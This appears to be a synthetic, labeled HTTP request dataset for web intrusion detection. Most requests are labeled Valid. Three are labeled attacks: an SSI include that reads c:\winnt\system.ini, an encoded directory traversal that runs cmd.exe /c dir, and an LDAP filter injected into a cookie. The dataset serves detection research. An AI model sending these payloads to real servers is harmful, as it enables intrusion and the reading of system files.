Via: HTTP/9.8 www.3ecHsE.css, 8.8 213.200.149.98:6437, a6efm9/7.2 232.90.148.208:9
Transfer-Encoding: compress
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14459
Start - Id: 19734
class: Valid
GET /uoT/uwekbux5Zzxcyl2NIn/8RC/t1MEhWEEin/R8arpssae/Dn9eeotattaj5ktuyaad/5nrP.AUDnEPhwN.html?P4Rti6gH4=aE1wiao44ctIseel&ekWzdtyz=fsbx%27scriptSadminssjddo%3A+56cat&Nslyuotsceizht=dl7shtpassobject6a%27IYb&caDm6=srb36ozElecnrtrV&extioniriDhoed=hmnPv7E5&8hwyi=dguvgFssns5e HTTP/1.1
Host: www.qeid.uk:80
Connection: Scee
Accept: application/zip, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cepfw-i
Cache-Control: max-stale=64523
Client-ip: 207.179.57.163
Cookie: 0catxA=7]>;rautH=59740;rEe=Jhaving
Cookie2: $Version="96"
Date: Tue, 11 Apr 06 16:50:38 GMT
ETag: "9Eu4dPdUshDtjLUn-g1z"
Expect: gcbr
From: qiie5tho@Egnvd.org
If-Modified-Since: Sat, 03 Mar 07 09:05:57 UTC
If-Unmodified-Since: Thu, 11 Feb 10 13:13:19 GMT
If-Match: *
If-None-Match: *
If-Range: "HVEWag@mfG@QVdW"
Max-Forwards: 2
MIME-Version: 8.6
Pragma: ry=eaes
Proxy-Authorization: NTLM aWVyN3VzaG8wbmhjaGNhb214SW9uN2FldHMzTWl0c2RvYW4ya2lIcGQ=
Authorization: NTLM aHN0TTllZGVvdGdjODhhYXJvbnRiYnNzSHlFcGVjb2Nh
Range: 4774-
Referer: /ynonrr/iho3ega/dtsn/edal.asmx
TE: gzip;q=0.6,trailers,gzip;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/1.3 (Machintosh; U; PPC Mac OS X 0.6; ai-ht; rv:6.3.2) Gecko/20671423
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5028x203
Via: 5.5 21.191.219.210:44
Transfer-Encoding: identity
Upgrade: onsjt/4.9
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19734
Start - Id: 1154
class: Valid
GET /a8Uj0Lwwk11.X@vl/r./6Afh@T/ajMeathfct4tl0ncts/ustn4caf0/adetZvyxN/adobaeima/d1.html?dheqso34gi=842594135&xhziEwo5zTsel=em&stinibg=Gco%3Dlib%3De%26szeso+u%28%2Bj&zD8y=84803&ewetElsr=hioit&efiwechiigex=eioQrn%2FEa&FYN4dxudN5=10&au4eeu48pea=eurvmitano&us8otiett=eadvh8hae7TtNjpeer&err5szf=5611097&bn7dRxRooaseo=470322 HTTP/1.0
Host: 168.237.243.228:63209
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: imyl-1;q=0.2, iDnsa-irivKiar;q=0.4, rke-ts2nuse;q=0.9, iaoInan-lshhanie;q=0.7
Cache-Control: max-age=023
Client-ip: 87.132.125.217
Cookie: feAnsad=7unketjTh;8llwgf4=zirzianirxaannrsmr;ldwho=t__;shnxxsoonhu=0562;unsqyauA=5754
Cookie2: $Version="57"
Date: Thu, 31 May 07 10:03:03 GMT
ETag: W/"IRwwZdib6-6SY5f"
Expect: r1xhc9ql
From: is2pl@e3nrm.st
If-Modified-Since: Tue, 17 Mar 09 05:36:13 CET
If-Unmodified-Since: Mon, 01 Mar 04 21:09:13 CET
If-Match: "XK6qZHC@vD4d81uJ-tk"
If-None-Match: *
If-Range: *
Max-Forwards: 0362
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic aWlkeTJ0ZXM6bmVpdDd5SQ==
Authorization: NTLM ZTZyZTRpZWlpTGVockZoUEl5MmU1bHFpdHJ0dWVmaHJoYQ==
Range: 96-1973,-76
Referer: /qlwth/03tL/4tucusrh/oonl/udl8hcir.pdf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: kNsoQYK http://www.t2he.biz
UA-CPU: x86
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 597x246
Via: 0.8 www.hwrejh.jpg, FTP/2.3 88.29.187.181, 9.7 www.Hsdtg.png
Transfer-Encoding: gzip
Upgrade: stc7/1.6
Warning: 977 184.2.254.69 "AKeetsfonarsxee7ilss" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 82528622
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 1154
Start - Id: 40480
class: SSI
GET /eleaaehefne/a4Xv/eTGpad-waLyu/twFN_zJ-3FlVxih.css?skftmDTe=%3C%21--+++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&al=hacaaoe2&dcocodao=breEtk&A7AKdBKUXIIG=ro+o+hernn%2F6i&oeannlueEo=dru%29a HTTP/1.1
Host: www.Ee4Rmfa.ch
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip;q=0.2, identity;q=0.8
Accept-Language: *
Cache-Control: min-fresh=92
Client-ip: 254.154.187.94
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="524"
Date: Mon, 12 Feb 07 15:25:35 CET
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Sat, 04 Sep 04 08:52:46 CET
If-Match: *
If-None-Match: "h4v86sB7siBekV4PXd"
If-Range: Mon, 27 Aug 07 21:59:31 CET
Max-Forwards: 67
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest algorithm=MD5-sess
Range: 6740-758,0802-
Referer: /Ardei/eaoNsa/jotrleu/826asre4/MlTe.rar
TE: chunked,gzip
Trailer: Host
User-Agent: i8H-fMa1Zc http://www.iujreyto.com
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7701x851
Via: HTTP/2.6 www.tuaktt.js:5
Transfer-Encoding: compress
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40480
Start - Id: 11794
class: Valid
GET /r1ntnh18c/95LjoptWOAS./du_L9HftpJ/neruonte/mOHnl.gif?sxaDe=8&ohavingSSWD9DT=729577390&ez=167 HTTP/1.1
Host: 66.106.128.176
Connection: or4ivV
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=9
Client-ip: 199.123.97.198
Cookie: lfesmn=Aste
Cookie2: $Version="00"
Date: Sun, 05 Nov 06 24:00:41 GMT
ETag: "uFZvGakZOkDpFEwmBn19"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Sat, 28 Jan 06 06:59:29 CET
If-Unmodified-Since: Fri, 18 Aug 06 09:15:26 UTC
If-Match: *
If-None-Match: *
If-Range: "lUMlRVioo62o_WPbf"
Max-Forwards: 8
MIME-Version: 0.0
Pragma: nn='fs'
Proxy-Authorization: otomt nIsr=ikrotu
Authorization: Basic dG9kckl1Om5zbVR0dXA=
Range: 0942-
Referer: /lenianz.shtml
TE: chunked;q=0.9,chunked;q=0.0
Trailer: From
User-Agent: Mozilla/3.5 (compatible; MSIE 9.6; Unix; adefmoss; t7rsmitee)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: HTTP/2.1 55.219.30.233, 1.4 www.heolwd.css, HTTP/3.2 121.22.14.180
Transfer-Encoding: deflate
Upgrade: meE/0.7
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 89221086551285
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11794
Start - Id: 7665
class: Valid
PUT /tosgrotlAnotceriwi/Jjc78.png? HTTP/1.0
Content-Length: 177
Content-Language: ezs
Content-Encoding: compress
Content-Location: http://www.riewtrS.fr/watx/teroxe/lxh64c.pl
Content-MD5: bG5wczRlYWZpSDJvdnloaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Mar 08 24:50:52 CET
Last-Modified: Mon, 14 Jun 04 21:49:24 UTC
Host: 21.59.239.39:9
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: a-j4ol, oiRoTwtr-x;q=0.0, at-a, snNo-09r, o4gahquE-nt2u;q=0.0
Cache-Control: only-if-cached
Client-ip: 41.206.202.253
Cookie: za8Gmegsu2=aez
Cookie2: $Version="1"
Date: Sun, 07 Sep 08 19:47:26 UTC
ETag: W/"nwZZrkAXGQpdqZtyCF"
Expect: 100-continue
From: c3rer@Oormhttx.fr
If-Modified-Since: Sat, 10 Apr 10 03:52:31 CET
If-Unmodified-Since: Tue, 18 Dec 07 23:01:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 4.9
Pragma: fwi='ubtdg'
Proxy-Authorization: Basic b3A5aXJlZWw6dGZtZWVo
Authorization: Basic b242YWk6RWNhc21z
Range: 011790-
Referer: http://1sohasae.ch/saenetxt/fj5ne/3misa/7pkgato/tgfLk.sh
TE: deflate
Trailer: Accept
User-Agent: tiooaaan0y70R
UA-CPU: 68000
UA-Disp: 319,9267,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: FTP/8.6 222.117.149.130
Transfer-Encoding: identity
Upgrade: elei/3.8, uih7yT/2.2, o6nf/3.9, 8tygnz/1.0
Warning: 017 54.146.31.35 "emaeavHx" 
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

iPIsXmZ=7&uibtdde0ee=h ae&snt=]iibgsound&tcewwt4kope=o;+ts?uselecte=sss5s;&5wacR=mcytata ?btkomrmoaRE&aiHeah=swvCq6rj.n&rttahtu8q=74459292&D1Tbi3g=a7u?Dal3sarbue

End - Id: 7665
Start - Id: 18840
class: Valid
GET /6Od3autoexecqed1m-OXb.php4? HTTP/1.1
Host: 23.231.180.20:93
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.8, windows-874;q=0.0, iso-8859-8-i;q=0.5, windows-1250, iso-8859-8
Accept-Encoding: gzip, deflate;q=0.2, compress
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 208.166.219.41
Cookie: 3a=899
Cookie2: $Version="1"
Date: Thu, 01 Feb 07 13:31:39 CET
ETag: W/"FfhxfqFGS02zMiOb"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Thu, 17 Dec 09 08:36:04 UTC
If-Unmodified-Since: Wed, 08 Apr 09 13:25:13 CET
If-Match: *
If-None-Match: "y7zXq0mYraxlAe2"
If-Range: *
Max-Forwards: 53
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: nrIw tamndt8e=itrl
Authorization: NTLM N3g5RWdmcnRucjNlbmF0aWUxNWxuc3B1ZXJFeDdDdWR1RWFybjFldXdlZXRtanI=
Range: -9,1224-02
Referer: http://ePospel.uk/eN6t.mdb
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.5 (X11; U; Linux i586 0.0; rE-ao; rv:1.2.3) Gecko/84259662
UA-CPU: MIPS
UA-Disp: 788,1566,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2376x8658
Via: 3.7 8.171.215.217
Transfer-Encoding: fe4cn
Upgrade: q6os/7.0, ezs/8.2
Warning: 716 39.208.196.119 "rU4esiddouooe" "Thu, 18 Nov 04 04:46:05 CET"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18840
Start - Id: 13492
class: Valid
GET /Tlby/6pA2Xav/fdEaec/4uhtmldCyxntti/3deqiat2/setTw/ild593j/d-/zARwDboot.inicjrHR8du/aLQwZndtOoVJfai3f/gSDHJM0pm5/8tiG1SUFHYM.html? HTTP/1.0
Host: www.8reh2.st:257
Connection: keep-alive
Accept: audio/x-wav, text/plain, image/jpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: feDs-dH;q=0.1
Cache-Control: vt=8ohhmxn
Client-ip: 115.218.99.104
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="3"
Date: Fri, 29 Oct 04 11:50:08 GMT
ETag: "OHtM-9dIFcY2vcG"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Thu, 21 Jan 10 11:15:34 UTC
If-Unmodified-Since: Mon, 22 Sep 08 23:09:07 GMT
If-Match: "TTuOc.f1eKIF4TZthm"
If-None-Match: "-6XVopEyzMM0ksG"
If-Range: "5B1MiVkXba-txEzCjiAS"
Max-Forwards: 03
MIME-Version: 0.3
Pragma: gAcs='evi'
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: heja dqamer=tdaledtt
Range: -36203
Referer: http://Sakd.de/ebssay/5sse/twsnohlo/iaoaio.swf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.0 (compatible; Konqueror/9.5; Linux i586; 4o8Yaala; Rp1Ttoini)
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: HTTP/3.4 www.Bogfoe.jpg, HTTP/5.2 165.168.73.48:3, gea/8.2 185.6.28.11
Transfer-Encoding: deflate
Upgrade: sldtn/3.8
Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 102.230.110.42
X-Serial-Number: 44417038819
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13492
Start - Id: 44092
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 11.79.75.82
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: fct='i'
Client-ip: 237.235.110.125
Cookie: pOaaeuia8eog= h;8mcbiIJooesn=m7m;ea9dgAasa=du9Oe4sid;5.dnj=8nYFty0c
Cookie2: $Version="617"
Date: Sun, 03 Apr 05 04:14:41 CET
ETag: "ZS9GbP3St8Y_vcI."
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Mon, 07 Nov 05 13:11:27 UTC
If-Unmodified-Since: Sat, 01 Oct 05 18:17:51 GMT
If-Match: "mJG1VccndMgHM4B"
If-None-Match: *
If-Range: Tue, 27 Mar 07 15:16:41 GMT
Max-Forwards: 5
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: /pTn6l8b/rhq2Aha/allbt.gz
TE: chunked
Trailer: If-Match
User-Agent: twexois/2.1
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 521 www.mjfat.css "dRa1e4l2ilrotmytl" "Sun, 12 Nov 06 05:55:58 UTC"
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44092
Start - Id: 16126
class: Valid
GET /sytyhrkgwuiOsNTns/vrXVNBr@KP0.cfm?PVBg7j75M_=1c&xtevmxsdEne=kOsyPrbroruonOn HTTP/1.1
Host: 74.117.210.235:29652
Connection: close
Accept: text/*;q=0.4, image/*, text/xml
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, compress;q=0.5, identity, identity
Accept-Language: erghtikt-t
Cache-Control: min-fresh=9121
Client-ip: 52.195.250.238
Cookie: UQ5dtpIj=aj0nnJwjYu;leas9y5ytAjnog=8 etsa9pydkrs inputnsW;e4qee= ce scriptlnn&dcsUmSx;oOU5tii=p2Gd0NjH.Si;hriUvbscriptC5=ouOaxdcr)ipbrsl
Cookie2: $Version="7"
Date: Sun, 19 Jul 09 17:35:58 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 1ebbA3Jq
From: eutnTors@herbtLcsty.fr
If-Modified-Since: Mon, 17 Jul 06 01:40:51 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:08:46 CET
If-Match: *
If-None-Match: "km201qEctfLtT8b"
If-Range: "l4L9zmqgWGfnNBP"
Max-Forwards: 816
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="ra9laces"
Authorization: vzete 8eni9u=eDhge
Range: 396-,06-480,6-
Referer: http://www.io26.st/eheen/sriz/2yrDn6Ha/ckctn.gif
TE: chunked;q=0.1,trailers,gzip;q=0.8
Trailer: Pragma
User-Agent: fatY70se (oDWxiXIP; pA4PdO)
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8164x933
Via: 6.5 www.dbcD2ao.html, a4rnN/2.5 www.cbSc.jpeg
Transfer-Encoding: mw2nh; r7he=avtnEhci
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16126
Start - Id: 1368
class: Valid
GET /r..4ha1m6ReQX6fkOv.tiff?@bseSEPlUwadminV=2649&robjectedAjC8=t6httpnsam%3F8jadminncdoj%3Ascei&ohe2tbT=It%2Fgaytzotbnnrr%3Cdt&asemwTbt=nlfcsmf%3BCrn&ekoWoDbanzb=2199&1rRPRFn3N=ns9d HTTP/1.1
Host: 23.61.248.248:71626
Connection: close
Accept: text/*;q=0.7
Accept-Charset: x-mac-japanese, windows-874;q=0.5, hz-gb-2312, iso-8859-15, iso-2022-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=79
Client-ip: 85.112.24.2
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="4"
Date: Sun, 02 Mar 08 16:37:04 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: 100-continue
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sat, 20 Mar 04 23:31:02 UTC
If-Unmodified-Since: Wed, 22 Mar 06 04:16:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 5351
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: emmDIe t0nmlL=fotR
Range: 24-
Referer: /d1er/6cqyaa.swf
TE: gzip,trailers,chunked
Trailer: Date
User-Agent: suBLRE http://www.DggBc.fr
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: deflate
Upgrade: Iifh/3.1, atthe/8.5
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1368
Start - Id: 31633
class: Valid
GET /agoPvMVrKhce7RyAQHtV/wp-fN26/6%uhomessystem/reSsEZKnIW0asEe/Ir19jRhX60tnjbg/ghbaryhreuUrmna/oVH2C/dRQUebvEX0LajZtF9a..asmx?nurLnull4T.A=4&6auNGmjtdrRDaoe=%26ufrom&sun=Ey&oVPZ_=265767&ijhf=5433885000&VpassthruCF7@nDL=rhhosatouh&meivd=wio&itws=iiopen&teiSnj=andinty&eMtntgosSqaaz2M=032021387&op=hfjssDdlahiieo2r&tt=tpo6 HTTP/1.1
Host: 159.177.12.13
Connection: close
Accept: text/*
Accept-Charset: x-mac-hebrew, koi8-r, koi8;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 51.126.92.214
Cookie: tshitkathtedhhf=m+EsjUM;s]Xiopen 
Cookie2: $Version="05"
Date: Sun, 25 Oct 09 22:31:35 UTC
ETag: W/"ywRJ44ZaNecFGg2Jqedc"
Expect: 1ttae=aoaTssae;wsAstE
From: unmedtea@rTol7svi.it
If-Modified-Since: Mon, 20 Sep 04 12:09:54 GMT
If-Unmodified-Since: Sat, 05 Apr 08 17:23:14 CET
If-Match: "hKZEh0dOG8_idYhK"
If-None-Match: *
If-Range: Tue, 20 Nov 07 20:45:17 CET
Max-Forwards: 659
MIME-Version: 6.7
Pragma: n3escu=oLts
Proxy-Authorization: ab9E dm2ejE=mryc
Authorization: NTLM ZXNjYXBhdHNydnJkeWhlZmRONjY1RTljbGFpc21lMW9iY2xlZWd1ZXI=
Range: 2998-103,-3,3141-
Referer: /ztt5dss/qfrcl6i/shiaat/Dbkird/vegAsy.conf
TE: deflate
Trailer: Warning
User-Agent: sxmek5.F http://www.atouec.cz
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8191x528
Via: tKNt/1.1 www.rrtiiii.jpeg
Transfer-Encoding: identity
Upgrade: o45mrn/3.4, Xue/3.4, Eoh/8.3, ote/8.9, 9Uiay/0.3
Warning: 978 www.uptale.png "3tTseeil7joaptosn" "Wed, 13 Sep 06 03:43:55 CET"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31633
Start - Id: 2002
class: Valid
GET /YOBstdin/sp/3evmou0hsej1ntnO/.vE6l2/oNlocationIL/m6/h_iUTj.FfEi9GZ_dsxC/C5roihirc/j0eibwuojert/TzNJw6kop.js?NOa1at=7195326438&Seop4hnrm=eiitoces0h6tnSau&ielu4eoAhafGeo=tefA41kvbqmsetk&em=f7yraoEttrnEEq&eitprtmlce=maeOle&8ngteDaNenr9=tesh5E&lr3srNpiend=codocumentA%25u+RM&gih7cF5h=rlsopenvshautoexeciframeeisl%3Bsf&tmtftMloxacnSn=nooecaaeaeyeee&iitae=4enephp%40%2F&gi=aI&sryiea=sTy1ehotw&Mbitxent=umpeneh&neEohMcAsdo9t=c%2Ftgar HTTP/1.1
Host: 70.36.18.109
Connection: f0bs0ex
Accept: */*
Accept-Charset: iso-2022-kr;q=0.6, iso-2022-kr;q=0.7
Accept-Encoding: compress;q=0.2
Accept-Language: 2e-h
Cache-Control: no-store
Client-ip: 82.159.44.77
Cookie: e8dtlnPnRd=ouitv;wAu=nkjyC@m3i;suepbaoi9ohotb=1959220
Cookie2: $Version="3"
Date: Tue, 30 Mar 04 11:27:35 GMT
ETag: W/"w2u94EbQOo5wOm0e"
Expect: 9Toz
From: tlvajp@oiboillauo.de
If-Modified-Since: Wed, 05 Apr 06 16:39:19 CET
If-Unmodified-Since: Wed, 24 Mar 10 14:34:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Jul 04 17:13:54 CET
Max-Forwards: 1273
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM b2VpZk9zcG54dGVldG91czgzaW9vaWVkRmRocjF0Ym4=
Authorization: Basic aWNKeGlpZjptNzJlY2lu
Range: 9726-,-403498,8792-
Referer: /7r8tYatN/ja92bni/lnotel/hlra4.msf
TE: gzip
Trailer: Via
User-Agent: Mozilla/7.0 (Windows; U; WinNT 8.8; e0-fc; rv:7.3.9) Gecko/27393841
UA-CPU: MIPS
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 396x457
Via: 2.3 244.172.94.164
Transfer-Encoding: 7qaurs; hspeuz=b0tesgl
Upgrade: icjnho/3.6, diut9V/0.7, atedi/1.4
Warning: 274 www.tv7U.jpg "ocil" "Thu, 03 Sep 09 01:43:46 UTC"
X-Forwarded-For: 241.61.46.107
X-Serial-Number: 1442191022000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 2002
Start - Id: 2927
class: Valid
GET /0taunofgrpe05ra/ekleso3CIEmsh9piawk/htaccesbqj_SSnph-y.aspx?eeeAoalnn=qtB%3Fi&erD=%3F&mzsfiiraEEhrt=eXN&wktehn9reT=39 HTTP/1.0
Host: 214.125.59.21:80
Connection: sEows
Accept: video/*;q=0.1, audio/basic;q=0.7, application/rtf;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, deflate;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 118.72.173.126
Cookie: ssnse= armeniiwinntn;~>;g9itmrr6trttnh=855899;nph-GrNI=e0ys8alallod$~Rnsvarhrp7;fpxU-S31ObGZ=Th;ss=863
Cookie2: $Version="7"
Date: Thu, 05 Mar 09 01:03:12 UTC
ETag: "A-367QW-qbH4e9vzMAm"
Expect: oeset5r=ar8t;t3sipso
From: qg1rhg@3iIi.de
If-Modified-Since: Sat, 10 Mar 07 22:13:52 CET
If-Unmodified-Since: Tue, 14 Sep 04 09:47:12 GMT
If-Match: *
If-None-Match: "gpQPu9lYc8_ciZo6DNW"
If-Range: *
Max-Forwards: 438
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rieTn
Authorization: Esei csnLmtne=Uweie
Range: 8-0812,200838-406
Referer: /fteie/lNotspsr/aqmpjmaa.sh
TE: chunked,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/2.9 (compatible; usvd7; WinNT; eqm07yt)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 202x8189
Via: 2.6 30.32.243.194
Transfer-Encoding: deflate
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 228.20.165.235
X-Serial-Number: 369098757505343425
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2927
Start - Id: 36895
class: LdapInjection
GET /rxsbv/rilel/exec4Z.0HacceptCiyS/nGwJacT.jsp?rebpnobioeyo=ate&N3stdinktmpJLcKSU=atelinksaeo%2B%2F%3D&qH577=8feIshw0sosheet&ae=45221&t12dyma=scriptx%2Boi%3Fdspositionhc1&ZMF0aomsCPcl=nuU-d3ey-rp&cw=bd7ireotjqm5fR&f3Heegecls=3248676416&Sahzebadi=12 HTTP/1.0
Host: 162.214.222.240
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.0
Accept-Language: fx-graoab, o-et7lTar;q=0.3, mbah8-eeGstt;q=0.2
Client-ip: 229.192.158.129
Cookie: kfihjuv=aeaye)(&(objectClass = Br*)
Cookie2: $Version="11"
Date: Wed, 13 Aug 08 02:37:25 UTC
From: eehceTs@jTtcri.biz
If-Modified-Since: Fri, 04 Mar 05 21:38:58 GMT
Max-Forwards: 24
Pragma: eXnafere='cr'
Authorization: NTLM YmxybjNiY25lYUZ0Tmdzb3J3YW1vUjBFdGh0bjRtVHR0VXNhdGhmdHly
Referer: /346aerf/e5smi/tnagle/Endprta.sh
User-Agent: 2e0DAw (o3osNqxG-; i-TWSU_@; ezRLFy-XO; d-IpepS5)
UA-Color: color8

null

End - Id: 36895
Start - Id: 27125
class: Valid
GET /aYTX2ordEtyO--/P9copy/tC5nGdwjonQCUhq.doF1/uMf9_zxq6sL3xac/ACusadifdee/r.B9r0pa5_zY@osQncM/libnOMTVKWabrsystem4FQ/huH4oite/ysebnodserhjentae.asp?dtse8=s7tbi&thociIh9tentsDg=lmaikaEodthlrhlR&eaautrHw=8haperlirq&eidcttalrlSuel=9310&eahzmoelde=a%5D%24nwdo7%28a&oix=96150590&df=5&esis1zovfmerie5=mhWHmB8Rbq&CAftp5stdinDQUN=37406&ma=wIxdtgE8+%28i&coi3ny=9alhrbptsds&dlriftcsodtr=6&px2Q4Nvw=%3Crore%3BeSKestyleCiRb&yu=7&eat8e=%2B86 HTTP/1.1
